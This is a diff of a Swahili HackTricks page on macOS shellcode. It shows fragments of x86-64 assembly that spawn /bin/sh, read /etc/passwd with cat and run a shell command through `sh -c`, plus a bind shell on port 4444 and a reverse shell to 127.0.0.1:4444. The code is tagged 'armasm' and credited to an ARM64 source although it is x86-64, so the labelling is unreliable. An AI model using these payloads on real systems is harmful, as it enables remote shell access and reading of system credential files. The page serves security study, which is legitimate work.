-
-
+Imechukuliwa kutoka [**hapa**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) na kufafanuliwa.
+{% tabs %}
+{% tab title="na adr" %}
```armasm
bits 64
global _main
@@ -186,8 +204,10 @@ push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
-````
+```
+{% endtab %}
+{% tab title="na stack" %}
```armasm
bits 64
global _main
@@ -203,11 +223,12 @@ pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
```
+{% endtab %}
+{% endtabs %}
-**Soma na cat**
-
-Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, kwa hivyo hoja ya pili (x1) ni safu ya vigezo (ambavyo kumbukumbu inamaanisha rundo la anwani).
+#### Soma na cat
+Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, hivyo hoja ya pili (x1) ni mfululizo wa vigezo (ambavyo kumbukumbu zake ni rundo la anwani).
```armasm
bits 64
section .text
@@ -238,21 +259,7 @@ section .data
cat_path: db "/bin/cat", 0
passwd_path: db "/etc/passwd", 0
```
-
-**Wito amri na sh**
-
-Unapotumia amri ya `sh` kwenye mfumo wa macOS, unaweza kutekeleza amri za shell kwa kutumia lugha ya shell inayoitwa Bourne shell. Amri hii inaweza kutumika kwa kufanya vitendo mbalimbali kwenye mfumo wako, kama vile kuendesha programu au kufanya mabadiliko kwenye faili.
-
-Ili kutumia amri ya `sh`, unahitaji kufungua terminal yako na kuingiza amri unayotaka kutekeleza. Kwa mfano, ikiwa unataka kuendesha programu inayoitwa `programu_yangu`, unaweza kutumia amri ifuatayo:
-
-```shell
-sh programu_yangu
-```
-
-Amri hii itasababisha programu yako kuanza kutekelezwa na matokeo yake yataonyeshwa kwenye terminal.
-
-Ni muhimu kukumbuka kuwa amri ya `sh` inaweza kutumika kwa madhumuni mbalimbali, ikiwa ni pamoja na kutekeleza amri za shell, kuzindua programu, au kufanya mabadiliko kwenye mfumo wako. Hata hivyo, ni muhimu kutumia amri hii kwa uangalifu ili kuepuka matatizo yoyote yanayoweza kutokea kwenye mfumo wako.
-
+#### Kuita amri na sh
```armasm
bits 64
section .text
@@ -290,11 +297,9 @@ sh_path: db "/bin/sh", 0
sh_c_option: db "-c", 0
touch_command: db "touch /tmp/lalala", 0
```
+#### Kifungu cha Bind
-**Bind shell**
-
-Bind shell kutoka [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) katika **bandari 4444**
-
+Kifungu cha Bind kutoka [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) kwenye **bandari 4444**
```armasm
section .text
global _main
@@ -369,11 +374,9 @@ mov rax, r8
mov al, 0x3b
syscall
```
+#### Kifaa cha Kugeuza Shell
-**Reverse Shell**
-
-Kichwa cha kurejesha kutoka [https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html). Kichwa cha kurejesha kwa **127.0.0.1:4444**
-
+Kifaa cha kugeuza shell kutoka [https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html). Kifaa cha kugeuza shell kwenda **127.0.0.1:4444**
```armasm
section .text
global _main
@@ -435,7 +438,16 @@ mov rax, r8
mov al, 0x3b
syscall
```
+
+Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
+Njia nyingine za kusaidia HackTricks:
+
+* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
+* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
+* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.